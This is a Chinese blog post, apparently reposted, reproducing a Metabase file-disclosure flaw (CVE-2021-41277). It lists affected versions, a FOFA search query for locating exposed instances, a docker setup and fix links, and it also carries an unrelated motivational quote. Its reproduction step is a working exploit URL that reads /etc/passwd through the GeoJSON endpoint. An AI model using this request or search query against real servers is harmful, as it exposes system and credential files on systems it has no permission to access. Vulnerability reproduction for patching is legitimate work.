Metabase 敏感信息泄露漏洞复现(CVE-2021-41277)
Posted 星球守护者
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Metabase 敏感信息泄露漏洞复现(CVE-2021-41277)相关的知识,希望对你有一定的参考价值。
漏洞描述
- metabase 是一个简单、开源的数据分析平台。
- 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证
- 攻击者可通过该漏洞获得敏感信息。
漏洞编号
- CVE-2021-41277
FOFA 查询
app=”Metabase”
影响范围
- metabase version < 0.40.5
- metabase version >= 1.0.0, < 1.40.5
修复版本:
- metabase version >= 0.40.5
- metabase version >= 1.40.5
环境搭建
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
漏洞复现
http://ip:3000/api/geojson?url=file:/etc/passwd
漏洞修复
1、 参考漏洞影响范围,及时升级至最新安全版本:https://github.com/metabase/metabase
2、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
摘抄
成年人的世界里
辛苦是最不值得炫耀的,
你早出晚归,废寝忘食,
只是辛苦,并不是努力。
仅仅流于表面的勤奋,
只会掏空了你的精力,
让你变得盲目且疲惫。
而有效的努力,
终究会让你成为更好的自己!
### 免责声明 `本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!`
以上是关于Metabase 敏感信息泄露漏洞复现(CVE-2021-41277)的主要内容,如果未能解决你的问题,请参考以下文章
CVE-2021-41277——Metabase 信息泄露漏洞